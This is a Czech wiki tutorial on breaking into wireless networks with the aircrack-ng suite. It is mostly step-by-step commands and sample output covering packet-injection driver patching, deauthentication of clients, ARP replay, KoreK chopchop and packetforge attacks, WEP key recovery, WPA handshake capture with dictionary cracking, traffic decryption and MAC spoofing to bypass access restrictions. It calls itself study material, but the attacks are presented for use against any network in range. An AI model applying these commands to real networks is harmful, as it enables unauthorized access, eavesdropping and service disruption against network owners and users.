Hacking WiFi sítí

Z ICT security wiki | airdump.cz
Přejít na: navigace, hledání

Aktualizované a doplněné pokračování původního článku naleznete v textu Hacking WiFi sítí 2011

Český BackTrack, další pentest distribuce a pomůcky

HASHe a wordlisty na prolamování hesel můžete poptávat přímo na portálu airdump.cz stejně jako upravený a počeštěný BackTrack Linux nebo WiFiSlax..

Windows XP Windows Vista Windows 7 tutoriály

Postupy a tutoriály testované na starším Windows XP fungují úplně stejně i na novějších verzích Windows (Vista, 7)..

Aircrack CZ lokalizace

Na airdump.cz mimo pentest (hack) operační systémy lokalizujeme i různé aplikace. Posledním počinem je počeštění aircrack-ng. Pokud máte zájem přispět překladem nebo jinak čtěte informace. Na stejném místě můžete jako donate uživatel poptávat i lokalizovaný software..

WiFi Hacking - Crack WEP

en.gif. Text Hacking WiFi sítí je studijní materiál - nepopisuje všechny aspekty problematiky, naopak byla snaha popsat co nejvíce technik prolomení zabezpečení bezdrátových sítí. Pro snažší orientaci je doporučeno nastudovat alespoň základ a orientovat se v souvislostech (nástroje, hardware, počítačové sítě). Bezdrátové sítě (standard IEEE 802.11) fungují v rámci referenčného modelu Open Systems Interconnection na dvou vrstvách. Na první fyzické vrstvě vznikají a udržují se fyzické spojení. Podvrstva linkové vrstvy jménem Media Access Control (MAC podvrstva) řídí adresování a kontrolní mechanismy pro přístup k médiu.

Schéma WEP zabezpečení

Wep.png

Teorie zranitelnosti WLAN

Operační systém pro Hacking

Tutoriál Hacking WiFi vznikl na operačním systému Ubuntu 6.06 LTS Dapper Drake, funguje ale i na novější verzi (Ubuntu 6.10, 7.04, 7.10, 8.04, 8.10), stejně tak na dalších linux based operačních systémech BackTrack nebo WiFiSlax. Rozdíl je minimální (zápis příkazů - dle použité verze balíčku aircrack, aircrack-ng). Použita WiFi karta byla Z-Com XI-626, CM9, CB9-Ext. Informace o wifi kartách a chipsetech najdete v článku co umí vaše wifi karata. Konzultovat lze na IRC kanálu. Seznam aplikací: balík aircrack, aircrack-ng, kismet. Ovladače: HostAP + packet injection patch, madwifi a madwifi-ng. Na detaily se můžete ptát v našem fóru. Alternativní postup (pro Windows XP) je popsán v tutoriálu Injekce paketů WIndows XP, event postup pro Windows Vista v diskuzi aircrack + windows vista.

komentuj.jpg

Příprava

Instalace chybějících aplikací

Pokud máte vhodnou wifi kartu a instalované aplikace přeskočte na kapitolu 8 (Začínáme). V operačním systému Ubuntu (na rozdíl od Backtrack nebo Wifislax) nenajdete po instalaci všechny potřebné aplikace. Pro jejich instalaci je nutno upravit sources.list a instalovat (úprava platí pouze pro Ubuntu 6.06). Po instalaci OS je v seznamu (sources.list) k dispozici cca 5 000 balíčku, po úpravě sources.list až 20 000 (proto úprava). Novější Ubuntu (6.10, 7.04, 7.10, 8.04) má k dispozici standardně cca 24 000 balíčků, proto není úprava sources.list nutná. Aircrack a další aplikaci najdete v správě balíčků. Grafický manažer balíčků pro Ubuntu je Synaptic - najdete ve třetím menu Systém. Doisntalujte Kismet, Aircrack popřípadě Aircrack-ng. Závislosti se označí automaticky (to je výhoda manažeru Synaptic). Lze instalovat i nejnovější aplikace z domovské stránky (nevýhoda Synaptic je, že repozitář né vždy obsahuje aktuální verze). Neaktuální verze ale není problém. I když to není na první pohled patrné, určitě budete u pozdější kompilace čehokoliv potřebovat

  • linux headers
  • restricted modules
  • build essential

Patch ovladače HostAP

Postup pro patch ovladačů HostAP je pouze pro uživatele Wi-Fi karty Z-Com na Ubuntu (Backtrack a Wifislax obsahují záplatované ovladače i pro Z-Com karty s čipem Prism 2.5). MadWiFi ovladače pro Wi-Fi karty s čipem Atheros není potřeba v Ubuntu upravovat (testováno na verzích 6.06 a 6.10)! Distribuce Ubuntu 6.06 má ve zdrojích k dispozici ovladače pro Wi-Fi karty s čipsetem Prism 2.5, ty ale neinstalujte, protože ovladač HostAP je potřeba záplatovat v každém Ubuntu. V tutorialu byl použit HostAP verze 0.4.9 a Packet Injection Patch 0.4.7.

Distribuce instalováná z DVD nainstaluje kernel dle procesoru (v případě AMD je to kernel K7, v připade procesoru Intel i386). Injection Patch HostAP ovladačů pod kernelem K7 nefunguje správně nebo vůbec.

Postup pro patchování

Doinstalujeme (pokud není instalováno) hlavičky (headers) a kernel image i386. Nabootujeme do kernelu i386. Karta Z-Com XI-626 (paušálně pod Linuxem) bezi na modulu Orinoco. Zbavíme se modulu příkazem modprobe -r orinoco_pci ; modprobe hostap_pci (jako root).

Následne přidáme do souboru /etc/modprobe.d/blacklist řádek blacklist orinoco_pci, který zabrání znovunačtení modulu po restartu.

Stáhneme a aplikujeme patch:

wget http://hostap.epitest.fi/releases/hostap-driver-0.4.9.tar.gz
tar -xvzf hostap-driver-0.4.9.tar.gz
cd hostap-driver-0.4.9

wget http://patches.aircrack-ng.org/hostap-driver-0.4.7.patch
patch -Np1 -i hostap-driver-0.4.7.patch

Ve složce /home/user/hostap-driver-0.4.9/driver/modules/ najdeme následující soubory

  • hostap.c
  • hostap_cs.c
  • hostap_plx.c
  • hostap_pci.c

a v každém z nich odstraníme tyto řádky:

#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,14))
#error Host AP driver was added into Linux 2.6.14.
#error The version used in the kernel tree should be used instead of this
#error external release which is only maintained for old kernel versions.
#endif

Nyní kód zkompilujeme příkazem make.

Nepoužijeme make install ale soubory ručne zkopírujeme. Složku hostap napřed zálohujeme a potom její obsah vymažeme. Potom ze složky /hostap-driver-0.4.9/driver/modules/ tkopirujeme všechny soubory končíci na .ko (mělo by to být 7 souborů) do prádné složky /lib/modules/2.6…-386/kernel/drivers/net/wireless/hostap/

Ve složce /hostap-driver-0.4.9/driver/etc/ najdeme soubor hostap_cs.conf, který zkopírujeme do /etc/pcmcia/.

Po restartu spustíme tyto příkazy:

depmod -a
ifconfig wlan0 down
ifconfig wlan0 up

A otestujeme správnou instalaci příkazem dmesg | grep hostap.

Z-Com firmware

Úprava firmware je možná pouze ve wifi kartách Z-Com! Wifi karta Z-Com (firmware od 1.7.4) se v systému zaregistruje jako rozhraní eth0. Je doporučeno používat (pokud není, tak flashnout) firmware 1.7.4 (né starší ani novější). K otestování vaší verze použijte příkaz

 hostap_diag -p wlan0

Výpis vypadá nějak takhle:

Host AP driver diagnostics information for 'wlan0'
NICID: id=0x8013 v1.0.0 (PRISM II (2.5) Mini-PCI (SST parallel flash)
PRIID: id=0x0015 v1.1.1
STAID: id=0x001f v1.7.4 (station firmware)

Kanal č.14

Pro zprovozneni 14 kanalu na karte Z-Com potrebujeme z karty dump PDA (Production Data Area - něco jako registr karty) a vyeditovat 1 radek . Ignorujte ruzne navody na zmenu stavajiciho PDA za Japonsky a podobne. Staci vyeditovat radek 0x0104 (prepsat 1fff na 3fff) a nahrat firmware nazpatek. Kanal 14 není v Cesku oficialni zalezitost, i presto se najde par exotu na odlehlych mistech :-)

Testujeme Packet injection

Poslední verze suity Aircrack-ng obsahuje Aireplay-ng s volbou -9 - ta otestuje dostupné sítě ve vašem okolí na některou ze zranitelností. V případě kladného výsledku máte jistotu, že vaše ovladače injektují. Ani neuspěch nemusí znamenat automaticky chybu, protože pro získání dat je nutná souhra několika faktorů. Mimo jiné kvalitní signál. V případě, že je signál špatný, nezískate žádne data a test nemůže skončit úspěšně, i když je ovladač a karta v pořádku. Packet injection zajišťuje aplikace z balíku aircrack-ng, jménem aireplay-ng. Není to nic víc, než úspora času. Pro crack WEP klíče ale packet injection není potřeba. Pouze potrebný počet dat (IVs) získate rychleji. Pro orientaci balík Aircrack obsahuje tyto prográmky:

aircrack airodump airmon aireplay airdecap

Aircrack-ng obsahuje:

aircrack-ng airodump-ng airmon-ng aireplay-ng packetforge-ng airtun-ng airserv-ng

Předtím než začnete laborovat, doporučuji sprovoznit (ověřit) packet injection. Šetří to čas a později i stres. Existuji i další možnosti.

Pomocí aplikace Ethereal. Postup: Přepnou wifi kartu do monitor mode příkazem iwconfig nebo airmon. Nápovědu k aplikaci získate pomocí příkazu man nebo help (iwconfig –help).

iwconfig wlan0 mode monitor

nebo

airmon start wlan0

Aplikace iwconfig je součástí Linux Wireless Tools, aplikace airmon jak bylo uvedeno balík aircrack nebo aircrack-ng).

Aircrack-ng zápis pro aktivaci monitor mode je

airmon-ng start wlan0

Program Ethereal (nebo Wireshark) nakonfigurujte tak, aby zobrazoval trafic v realnem čase. pak stačí spustit zachytávaní dat na rozhraní které testujete (wlan0). Pomocí filtru zobrazit pouze deauth paketů. Jeho zápis je:

wlan.fc.type_subtype == 12

Pakety pro zobrazení vygenerujete v konzole spuštěného aireplay-ng příkazem

aireplay -0 5 -a 01:02:03:04:05:06 wlan0

Aircrack-ng zápis:

aireplay-ng -0 5 -a 01:02:03:04:05:06 wlan0

Výsledek: V okne programu Etherealu se objevi 5 deauth paketu s MAC address signaturou 01:02:03:04:05:06. tato metoda nefunguje 100%. Ale.. Zejména v případě, že rozhraní používá další aplikace nebo je proveden špatý zápis.

Deuath test. Otestovat packet injection lze i přímo v ostrém provozu, nebo u přípravy na penetrační test. ESSID skrytého Access Pointu je potřeba pro packet injection odhalit (tento parametr vyžaduje starší verze aireplay). No a tu je další možnost jak ověřit ovladače. Kdyz nebude fungovat deauth klienta z AP, na nešifrované síti zřejmě máte smůlu. Relevance výsledku testu je založena na předpokladu, že všechno ostatní je v pořádku. Všechno znamená přesně: Signál (nekvalitní signál = výsledek testu kterému nelze věřit), MAC spoofing v případě nastavené MAC restriction na AP (pokud s váma nebude Access Point komunikovat výsledek testu = automaticky zápor).

Některé pojmy a vychytávky

PWR

Hodnota vyjadřujíci sílu signálu není u všech wifi karet (ovladačů) stejná. Maximální hodnota se hodně liší. Zde je několik max PWR z aplikace Airodump-ng:

miniPCI CM9 [madwifi-ng] PWR 40
PCI Z-Com XI-626 [hostap]  PWR 200
PCI Ralink [rt24xx, 25xx] 200

Monitor mode HostAP

Kartu lze přepnout do monitor mode různě a často se to plete. Zvykněte si na pouze jeden příkaz. Tady jsou tři různe zápisy (se stejným výsledkem): iwconfig wlan0 Mode monitor další je airmon start wlan0 nebo pri ng airmon-ng start wlan0.

Airmon.png

Monitor mode madwifi

Novější ovladač madwifi-ng (ovládané pomocí wlanconfig) je dostupný u verze Ubuntu 6.10, 7.04, 7.10, v distribuci Backtrack a WiFiSlax. Ovládání wifi karty tedy záleží od verze ovladače. Novější ovladače používají tkz VAP. Pro ovladače madiwfi existují tyto příkazy monitor mode příkazy

  • airmon start ath0
  • airmon-ng start ath0
  • iwconfig ath0 mode monitor
  • wlanconfig ath0 create wlandev wifi0 wlanmode monitor

Ideální je u madwifi-ng zrušit všechna rozhraní a pak vytvořit nové síťové s běžícím monitor mode. Pozor novější -ng verze již pracuje s virtuálním rozhraním wlan0 a příkazem wlanconfig!

wlanconfig ath0 destroy
wlanconfig ath0 create wlandev wifi0 wlanmode monitor

Vtvořené síťové rozhraní je vypsáno pod sekvencí příkazu. Ve forum.airdump.cz je popsána a vyřešena chyba kdy se po ukončení VAPu (vitrual access point) vytváří stále nové rozhraní, s vyšším číslem (ath10, ath11, ath12..) místo jednoho základního.

Poznámky k výkonu wifi karty

  • Nejduležitější ukazatel je sila signálu. Příliš malá, nebo příliš velká vzdálenost je problém. V prvním případě (saturace) i když máte AP přímo na stole nemusíte detekovat žádný signál. Druhý případ (slabý signál) jasná věc.
  • Zobrazená PWR je autentická. Hodnota (u karty s chipem Prism) menší než 163 znamená beznaděj :-) Optimum je PWR 167 az 195. [Použitelnost linky je závislá také na spodní hranici šumu]. Hardware a ovladače v rámci chipu Atheros ukazuje intenzitu signalu jinak! PWR 20 až 40 je u karty Atheros v pohodě.
  • Zaměření nejvhodnějšího směru [polohy] pohybem antény a sledovánim PWR zabere minimum času. Zjištění polarizace je otázkou otočení antény o 90°
  • Nějaké to deci lze získat regulací výkonu. Standardně je na kartě Z-Com hodnota 198. Změna je možná příkazem:
iwpriv wlan0 writemif 62 130

Po vypnutí karty se nastavení resetuje. Upravením provozní rychlosti lze korigovat packet lost

iwconfig wlan0 rate 1M

Citlivost karty lze upravit příkazem

iwconfig wlan0 sens 3 [1, 2, 3]

Nezapomeňte na pojednání o limitech od ČTU a pokud to není nutné neatakujte stabilní sítě tím, že je budete rušit nadměrně vyzářeným výkonem, zejména pokud používate anténu se širším vyzařovacím uhlem.

Začíname

Airodump

Příkaz pro novější verzi aircrack-ng následuj vždy po příkladu. Spustíme Airodump. Ten do zastavení [ctrl+c] pouze skenuje dostupne site a ukládá data.

airodump wlan0 data 3 1
Airodump.png

a uvidíte zhruba to co na obrázku. Pro další krok (generování trafiku) je směrodajné:

  • Asociovaný klient na Access Pointu
  • Síla signálu.

Jednotlivé části provedeného příkazu:

  • 3 je číslo kanálu (volitelné)
  • data je soubor kde se ukladaji data (volitelné)
  • 1 (za trojkou znamena ukladat pouze IVs (volitelné)

Pozor.. Pokud budete ukladát kompletní trafik (bez volby --ivs) souboru data muze „narust“ na 10ky az 100ky MB..

Airodump-ng

Výsledek stejný ale novější verze Airodum-ng zapisuje stejnou věc odlišně.

airodump-ng --ivs -w data --ch 3 wlan0

Pokud se vám povedlo úspěšně spustit Airodump, nechte ho běžet (případně mrkněte na další možnosti aplikace). Pokračovat budeme generováním trafiku.

Příklad pro Airodump-ng

Díky nadefinovné MAC adrese Access Pointu se bude zobrazovat v konzole pouze jediný záznam. Tuto možnost lze použít v případě, že máte v dosahu mraky AP a klienti vám mizí mimo obrazovku.

airodump-ng --bssid 00:60:Bx:xx:xx:xx --ivs -w data --ch 3 wlan0

Nápověda pro aplikace

Kompletní nápovědu k aplikaci lze vyvolat příkazem

airodump-ng --help

nebo

man airodump-ng

Jméno aplikace je volitelné, --help a man funguje v systému Linux pro každou aplikaci.

Aireplay - Asociace na AP

Airodump běží. Těď je potřeba vygenerovat trafik. Není to nutnost, pokud ale nechcete čekat 50 hodin na dostatečné množství IVS čtěte pozorně. Existují 2 možnosti. První (-2 a -3) vyžaduje minimálně jednoho asociovaného klienta na AP a asociaci vaši WiFi karty na AP. Druhá (-4 a -5) funguje i na "prázdnem" AP.

Možnost první - Zaklepeme na vrátka (ještě jednou: pokud používate v aireplay prepínač -2 nebo -3 bez asociace na AP neuděláte zhola nic). V případě, ze je na AP nastavena MAC restrikce asociovat se lze jenom s platnou MAC.

aireplay -1 0 -e AP_jmeno -a 00:60:BX:xx:xx:xx -h 00:60:BY:xx:xx:xx wlan0

Aireplay-ng zapis:

aireplay-ng -1 0 -e AP_jmeno -a 00:60:BX:xx:xx:xx -h 00:60:BY:xx:xx:xx wlan0

Konsole zobrazí zhruba toto:

Association.png

Asociace v pripade dostatecneho signalu, znalosti essid funguje na 99%.


Kdyz Airodump nedetekuje zadne asociované klienty na AP znamena to: Spatny signal, spatna doba :-), ad-hoc sit, nebo se jedna o „datove“ AP, na které se bezne nikdo nepripaji a slouzi pouze jako datova linka [pouziva je napr. upc], repeater, [bridge]. Preskočte útok -1 -2 -3 a použijte rovnou útok -4 nebo -5

Aireplay - ARP generujeme data

Na AP vidíte asociovaného klienta, vaše asociace proběhla v pořádku. Tady lze pokračovat. Spustime packet injection pomoci Aireplay -3 (ARP request reply). Za pomoci „opakovani“ se znasobi trafic, pocet WEP paketu, potazmo pocet inicializacnich vektoru :-) Mohl jsem použít i volbu -2 mně ale více vyhovuje -3 proto ji uvádím i v tomto příkladu.

aireplay -3 -b 00:60:BX:xx:xx:xx -h 00:60:BY:xx:xx:xx -x 600 wlan0

Aireplay-ng zapis:

 aireplay-ng -3 -b 00:60:BX:xx:xx:xx -h 00:60:BY:xx:xx:xx -x 600 wlan0

V okně konzole uvidíte zhruba toto:

Arp.png


Kde

  • -x 600 je pocet paketu za vterinu (počet ARP requestu se u Aireplay zastavi na cisle 1024).
  • -3 je (přepínač) aireplay útok
  • -b je mac adresa access pointu
  • -h je mac klienta nebo zdroje na který útok směruje

V prvnim okně konsole (beží Airodump) lze kontrolovat progres Jak? Počet jednotek v sloupci data začne rychleji růst, nebo nezačne a pak víte, že vám to nefunguje).

Aireplay.png


Doba, za jakou Airodump shromáždí dostatek paketu (pro 64bit sifru 80 az 300 000, pro 128bit sifrovani 300 000 az 1 000 000 IVS) záleží na:

  • Rychlosti sítě
  • Kvalitě signálu.

Trvat to může 10 minut, hodinu. nebo 3 hoďky.

Tip:

  • Ideální je asociovat na AP stejnou MAC adresu jakou ma klient ktery (pokud existuje) generuje trafik. Když k tomu přidáte Packet injection, máte 300 000 IVS behem 5 minut.
  • Aireplay jako i Airodump a Aircrack lze zastavit a znovu spustit.

Aireplay - Deauth, Packet injection, Hidden essid

Detekovane AP ma slusny signal, vidite i asociovane klienty ale AP nevysila ESSID.

Aird.png

Použijeme Aireplay prepínač -0 (Deuath). Ten odpojí dle konfigurace příkazu jednoho nebo všechny klienty na AP.

Deauth to broadcast (všesměr)

aireplay -0 5 -a 00:60:BX:xx:xx:xx wlan0

Deauth s definovanou MAC klienta.

aireplay -0 5 -a 00:60:BX:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0


Aireplay-ng zapis:

aireplay-ng -0 5 -a 00:60:BX:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0

Konzole zobrazí:

Deauth.png

Deauth „odpoji“ klienta (-y) asociovaneho na AP a v první konzole (Airodump) se objeví jméno AP (ESSID). Jak to? Klient u asociace na AP ESSID vyšle a Airodump ho zachytí. Pokud útok funguje je to první prověrka Packet injection (je funkcni). Jako bonus máme jméno AP.

Hiden.png

Vysvětlivky:

  • 5 v příkazu znamená počet deauth paketu, ktere odešlete
  • -0 (nebo taky přepínač nula) je jeden z útoku (Deauth) Aireplay.
Muze se hodit: MDK Ska

KoreK chopchop

Na AP není žádny klient. V Aireplay-ng přepínač -2 a -3 nelze použít. Nevadí. Je jeden hodnej kluk. Provedl vlastní analýzu zranitelnosti a protokolu. O jeho bádaní je rozšířen záběr aplikace Aireplay, nově integruje útok (-4) kterému se dle autora říká KoreK chopchop. Jak to celé funguje?

Stačí dekódovat jeden paket (příklad s použitím platné MAC adresy asociovaného klienta na AP, jako zdroj lze použít i MAC AP)

aireplay -4 -h 00:06:B3:xx:xx:xx wlan0
Korek.png

Odklepl jsem vhodny paket (orientace dle source, destination MAC + nejake data navyše neškodí). Výsledkem je plaintext v souboru .cap a keystream v souboru .xor

Korek2.png

S tcpdump zjistime IP..

tcpdump -s 0 -n -e -r replay_dec-1111-220638.cap

a data vlozime do prikazu

arpforge replay_dec-1111-220638.xor 1 00:0E:2x.. 00:60:B3.. 10.10.17.1 10.10.17.215 arp.cap

Správnost IP adresy údajně nehraje žádnou roly. V nové verzi Aircrack-ng suite aplikace arpforge není. Náhradou za ní je packetforge-ng. Zapis příkazu je cca:

packetforge-ng -0 -a 00:0E:2x.. -h 00:60:B3.. -k 10.. -l 10.. -y replay_dec-1..638.xor -w arp.cap

Po uložení dat použijeme vygenerovaný soubor v aireplay-ng příkazem

aireplay -2 -r arp.cap wlan0


Odklepnout nabidku paketu..

Korek3.png


Aplikace airodump-ng zachycuje trafik

Korek4.png

Cracking WEP

Ve třetím panelu (okno, karta :) spustíme aircrack-ng. V případě, že souboru out.ivs obsahuje data z více Access pointů, program je rozliší a seřadí dle MAC adresy, očisluje je a zeptá se s kterou MAC adresu se má pracovat. Volba se provede navolením čísla a potvrzením..

aircrack -x out.ivs
Aircrack.png


aireplay-ng vygeneruje cca 800 000 paketů a aircrack-ng se zastaví s hláškou Attack failed. Possible reasons.. Nic není ztraceno.. :D Když aireplay-ng pořád generuje data (trafik), můzete nechat běžet - dobrých paketů není nikdy dost. Následně použijte experimentalni příkaz

aircrack -y out.ivs


Po každem spuštění aireplay-ng je vytvořen nový .cap soubor (do kterého se ukladaji pakety vrámci použité MAC adresy. Jméno souboru vypadá zhruba replay_arp-1105-165417.cap. Když selže přepínač -y se souborem out.ivs můžeme zkusit ještě experimentalni bruteforce (funguje i s .cap souborem z aireplay-ng.

aircrack -y replay_arp-1105-165417.cap

Příkazem aircrack-ng –-help získate přehled všech možností. Pomocí přepínače -x se u výpočtu (prolamování) hesla neprovádí bruteforce posledních dvou keybitů. Na online crack 128bit šifry vystačíte i s 900MHz CPU (procesorem). V případe, že vlastníte slabší procesor, méně vykonné PC nebo testujete 256 a více bit šifru, pakety můzete nejdřívě jenom ukládat a crack provést offline. Nebo použít crack bez grafického výstupu -q

aircrack -q -x -b 00:06:B3:XX:XX:XX out.ivs

Příkaz pro použití pouze vrámci alfa-numerických znaků

aircrack -c 00:06:B3:XX:XX:XX out.ivs

Soubor out.ivs je mozno spojit s jiným souborem .ivs, přenést jej na jiné PC, nebo pod jiný operační systém.

Na obrazku vidite zaverecnou fázi.

Aircrack1.png

Speciál

Rejects open-system authentication

Na AP ktere neumoznuje open-system auth nelze asociovat. Prikaz:

aireplay-ng -1 0 -e wireless -a 00:60:xx:xx:xx:xx -h 00:61:xx:xx:xx:xx wlan0

konci hlaskou:

Waiting for beacon frame (BSSID: 00:30:4F:36:04:D0)
Sending Authentication Request
AP rejects open-system authentication
Please specify a PRGA-file (-y).

Lze použít kombinaci experimentálního kódu MDK a Ska. Existuje i podstatne jednodussi cesta. KoreK chopchop a packetforge-ng. Pomoci teto techniky lze prolomit WEP bez asociace na AP :)

aireplay-ng -4 -b 00:60:xx:xx:xx:xx -h 00:61:xx:xx:xx:xx wlan0

Aireplay-ng-4.png

Odtuknout vvyzivnejsi paket..


Read 1094 packets...

       Size: 242, FromDS: 1, ToDS: 0 (WEP)
            BSSID  =  00:60:xx:xx:xx:xx
        Dest. MAC  =  FF:FF:FF:FF:FF:FF
       Source MAC  =  00:61:xx:xx:xx:xx
       0x0000:  0842 0000 ffff ffff ffff 0030 4f36 04d0  .B.........0O6..
       0x0010:  0090 9638 9353 2045 f65e 0100 4a62 0eae  ...8.S E.^..Jb..
       0x0020:  defa 2c0a 049e 2374 46e9 d5c4 d125 38e8  ..,...#tF....%8.
       0x0030:  f20a cf7b ac9e 0b60 4bce d284 5171 3336  ...{...`K...Qq36
       0x0040:  263d e597 13d8 cf9d f8a1 bf4b c3dd 6d92  &=.........K..m.
       0x0050:  cfd8 373e 1464 7cd2 888e 5b0a c6fc 057c  ..7>.d|...[....|
       0x0060:  d490 63eb aa53 37ea dedc 03b6 c9ea f86e  ..c..S7........n
       0x0070:  aefb 895f edc1 ad21 e2a1 8479 7a50 2bd1  ..._...!...yzP+.
       0x0080:  7af1 fca5 dbe5 d7ad bd8e 429b a638 2c1e  z.........B..8,.
       0x0090:  c98c ad3b 6f4a fa5a 623f 5291 59f9 bc50  ...;oJ.Zb?R.Y..P
       0x00a0:  a3f1 cda8 b05d 480e 1036 3745 a7cb 2452  .....]H..67E..$R
       0x00b0:  9054 3e19 b6cd fff4 7719 4193 0178 1665  .T>.....w.A..x.e
       0x00c0:  e4d7 085e 9207 9adb a9fa 5d05 820d fc01  ...^......].....
       0x00d0:  87c5 43e3 32b5 d1f4 4a11 fa8c 410b 2897  ..C.2...J...A.(.
       --- CUT ---

Use this packet ? y

Aireplay-ng -4 savethis.png


Saving chosen packet in replay_src-0623-171055.cap
Offset  241 ( 0% done) | xor = 32 | pt = 89 |  517 frames written in  1551ms
Sent 684 packets, current guess: A9...17:11:01  Packets per second adjusted to 375
Offset  240 ( 0% done) | xor = 0C | pt = 5E | 1134 frames written in  3404ms
Sent 408 packets, current guess: 96...17:11:06  Packets per second adjusted to 282
Offset  239 ( 0% done) | xor = B1 | pt = B0 |  431 frames written in  1298ms
Offset  238 ( 1% done) | xor = DF | pt = 46 |  449 frames written in  1794ms
Offset  236 ( 2% done) | xor = 2A | pt = 00 |  530 frames written in  2120ms
Sent 479 packets, current guess: DD...17:11:16  Packets per second adjusted to 212
Offset  235 ( 2% done) | xor = DD | pt = 00 |  490 frames written in  1962ms
Offset   40 (96% done) | xor = 76 | pt = 30 |   21 frames written in   105ms
Sent 5066 packets, current guess: B6...
The AP appears to drop packets shorter than 40 bytes.
Enabling standard workaround:  IP header re-creation.
Saving plaintext in replay_dec-3-30.cap
Saving keystream in replay_dec-3-30.xor
Completed in 753s (0.27 bytes/s)

Aireplay-ng-complet-in.png

Dalsi krok je vygenerovani "requestu" ktery se ulozi do souboru (PRGA) ktery lze pouziva opakovane. Bude "fungovat" i v pripade, ze na AP zmenite heslo.

packetforge-ng -0 -a MAC -h MAC -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-3-30.xor -w arp-req

Packetforge wrote.png

Nasleduje:

aireplay-ng -2 -r arp-request eth2

Aireplay-ng -2 arp-request.png


Schromazdeni dat a crack wep klice cca 45 minut.

Aircrack-ng 0.9 r453

Zjištění IP, Gateway

IP adresu, DNS, bránu a mnoho dalších užitečných informací lze vyčíst buďto přímo z dat které máme k dispozici nebo pomoci dalších nástroju které umí používat WEP nebo WEP pro dešifrováni trafiku. Mezi tyto nástroje patří rozhodne Wireshark nebo Ettercap. Potrebne udaje muzeme zjistit desifrovanim traficu.

airdecap -b 00:06:B3:XX:XX:XX test.cap

V Airdecap lze pro dešifrování použít WEP klíč i ve formátu HEX

airdecap -w 11A3E229084349BC25D97E2939 test.cap 

nebo pouzitim Etherealu s filtrem mac adresy access pointu. TCP provoz mac 00:06:B3:XX:XX:XX: WEP klic jde vlozit i primo do konfigurace Ethereal

wlan.bssid == 00:06:B3:XX:XX:XX (&& TCP) 

Pouzivat zjisteny WEP klic umi take Kismet.

wepkey=00:60:B3:XX:XX:XX,6263656869646162 

Kismet1.png


Po spusteni Kismet u Flags uvidime pismeno „W“

Kismet2.png


vlozime do kismet.conf (cca řádek 154). Nasledne spusteni programu pak odhali IP adresy prirazene jednotlivym MAC. [Seradime site třeba volbou -s [sort] -b [bssid], pak u toho ktereho AP volba -c - zobrazi klienty]

Kismet3.png


Je libo Matrix? V Kimsetu volba -d zobrazi data která protekaji AP.

Kismet4.png

Aireplay-ng + CM9 [a,b,g]

Atheros karta se v systemu Linux zaregistruje jako rozhraní ath0. Ovladac madwifi existuje ve verzi old a ng. Pokud funguje starší verze není duvod experimentovat. Ovladani WiFi karty atheros na poslednich ovladačích madwifi-ng je poněkud komplikované. Může zato změna příkazů pro ovládaní.

Zjištění podporovaných frekvencí na kartě (volba 0,1,2,3) příkazem

iwpriv ath0 mode 1

Výpis rozsahu kanálu.

iwlist ath0 chan

Vyjma novych moznosti ve verzi -ng a spusteni samotneho Airodump-ng, lze prikazy z baliku Aircrack pouzivat v baliku Aircrack-ng [t.z airmon, aireplay, aircrack – staci dopsat -ng a pobezi to] Vystup je az na detaily stejny.

airodump-ng --ivs -w data –-ch 6 ath0
Airdump-ng.png

..spustí Airodump-ng na kanálu č. 6 a ivs ukláda do souboru data. Soubor naleznete v ceste ve které je aplikace spuštěna (defaultně /home/user).

Pásmo 5 GHz

Airodump-ng scan (pouze) pásma 5GHz (5.1 az 5.8 GHz) lze docílit použitím prepínače --band

airodump-ng --band a --ivs -w data ath0

Airodump-ng v pásmu 5 GHz - pouze kanál 34

airodump-ng --ivs -w data –-ch 34 ath0

Seznam kanálu a frekvencí v pásmu 5GHz

Prolomení WPA zabezpečení

Pro získaní handshake použijte stejný způsob jako u deautentifikace klienta. S reautentifikaci klient opětovně zašle data které airodump-ng zachytí jako tkz. handshake. Příkaz si přizpůsobte dle vlastní potřeby (MAC adresy jsou smyšlené a použijte samozřejmě vlastní). Příkaz pro zapnutí záznamu dat na kanálu číslo 3 a ukládaní do souboru wpa-data.cap je

airodump-ng -b 01:02:03:04:05:06 -w wpa-data --ch 3 wlan0

Příkaz pro odpojení a vynucení reautentifikace klienta. Klient (po odpojení) zašle data které airodump-ng zachyti (tento způsob ale nefunguje 100%).

aireplay-ng -0 5 -a 01:02:03:04:05:06 -c 01:02:03:04:05:07 wlan0

Příkaz pro slovníkový útok je:

aircrack-ng -w password.lst wpa-data.cap

Jak získat handshake alternativní cestou (když selže klasický způsob) pro pozdější crack WPA klíče si můžete přečíst v článku Útoky na WPA sítě. Prolomení WPA lze otestovat na souborech které získate s instalací balíčku Aircrack-ng (naleznete je po instalaci Aircrack-ng ve složce test).

wpa.cap wep.open.system.authentication.cap wep.shared.key.authentication.cap wpa2.eapol.cap password.lst

Nejnovější útok na prolomení WPA zabezpečení za použití hashů a cowpatty je popsán v textu Prolomení WPA.

Připojení do sítě

Konfigurace - Dynamické přidělení IP adresy

Změna módu (pokud karta funguje jinak jako Managed např. jako ad-hoc nebo Master)

iwconfig wlan0 mode managed
dhclient wlan0

Konfigurace - Dynamické přidělení IP adresy + WEP klíč

iwconfig wlan0 essid "wifi" mode Managed key open s:"29reac7BOz9Sbv"

Konfigurace - Pevná IP Ad-Hoc

iwconfig wlan0 mode Ad-Hoc
iwconfig wlan0 channel X
iwconfig wlan0 essid Y
ifconfig wlan0 192.168.0.10 up


Konfigurace - pouze IP adresy

ifconfig wlan0 192.168.0.10 up

Konfigurace - pouze ESSID

iwconfig wlan0 essid Y

Změna MAC adresy

Sled šesti hexadecimálních čísel lze změnit příkazem

ifconfig wlan0 down
ifconfig wlan0 hw ether XX:XX:XX:XX:XX:XX
ifconfig wlan0 up

nebo dalším příkazem:

/sbin/ip link set wlan0 addr XX:XX:XX:XX:XX:XX


Linux utilita macchanger dokáže generovat a přirazovat libovolnou MAC.

macchanger -r wlan0

nebo konkrétní MAC

macchanger -m XX:XX:XX:XX:XX:XX

Restart site (jako root)

/etc/init.d/networking restart

Reset IP

ip addr flush dev wlan0

Bonus

Užitečné linky

Tipy

Než začnete..

  • Udělejte si dostatek času, čtěte, diskutujte, ptejte se.
  • Používejte vlastní poznámky (třeba program kNotes)
  • Každa aplikaceobsahuje manuál (man) nebo nápovědu (help) kterou lze zobrazit v konzole. Příklad pro manuál Aireplay:
man aireplay nebo aireplay --help

